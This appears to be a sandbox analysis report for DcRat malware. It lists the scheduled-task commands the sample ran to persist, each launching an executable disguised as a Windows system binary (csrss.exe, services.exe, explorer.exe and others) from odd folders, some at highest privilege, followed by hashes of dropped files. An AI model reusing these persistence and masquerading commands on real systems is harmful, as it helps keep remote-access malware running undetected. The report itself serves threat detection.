C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InjectI" /sc MINUTE /mo 7 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Inject" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InjectI" /sc MINUTE /mo 13 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "driverBrokercommon" /sc ONLOGON /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 12 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
158B
MD5ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA2561947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA5121fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86
-
Filesize
218B
MD57c9bb5fda146efee5ee4a243d6e404b0
SHA1c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA2561d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771
-
Filesize
522B
MD5cf054cb4dd3a2611b771fe67b621dc7d
SHA16f3768c0436933ba418a03b2ade39cd4ffb2f1dd
SHA256add2fe82610d0f7bdcfe3d6ff4dfe245f991e2f0b21a475c1377f062017a0de8
SHA5128ea088f7368d414b792f3a459779a73ee51f1dd0de80552acf5b58702ca2ac1a19904f9497ba137f5293ec389c4e19dde5bc51ea75f4179f1260f733323c7ea1
-
Filesize
235B
MD5c4e42cae876a05ae0c753a0a8fd32164
SHA1d8cc369a8649c85f0c25f0826d447f3c62191238
SHA25675daf4baae8d884fab1397f8524a6f645895de1a81e03ba5c776d7ec726abb45
SHA512e569796ef385532522c271e9d7832ff9bc0920ad4b73441024ab10ace401cf41fe182ea16fc2992044c444cb325beaf156a871d0dedd14672dd9c3b95d5ce1f1
-
Filesize
746B
MD5599938f2aed6b131cd8d747f26edb4d4
SHA162906394e606959918b273c8a6f711a85b0505ee
SHA256ab1325106363bf6a296704640c8c8d4194f240ca53080e7fa3ddae1c3338d562
SHA512f1d0434c1385cef8546a4dbdf38b64ec29a278c649732c0e7f178e1f8637f1864b216dda373188c10edd522e03241649ce3ccaf8ce39ae66043143ec06f1f8b1
-
Filesize
2.3MB
MD5d84e590c3715c79dc5b92c435957d162
SHA12901580903e4b356448d9fe7bea510261e655363
SHA256d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485
-
Filesize
75KB
MD5d428ddd1b0ce85a6c96765aeaf246320
SHA1d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA5123f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899
-
Filesize
229KB
MD58cc1e7cf94fec9bc505ce7411aa28861
SHA108703de84f3db427c368f16c873664d78bd83264
SHA256cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423
-
Filesize
2.6MB
MD56216b6bef94c09a40bfa263809b1ae56
SHA1a928120e65199c6aaae6c991aa0466f3f8b06020
SHA256eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA5120e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215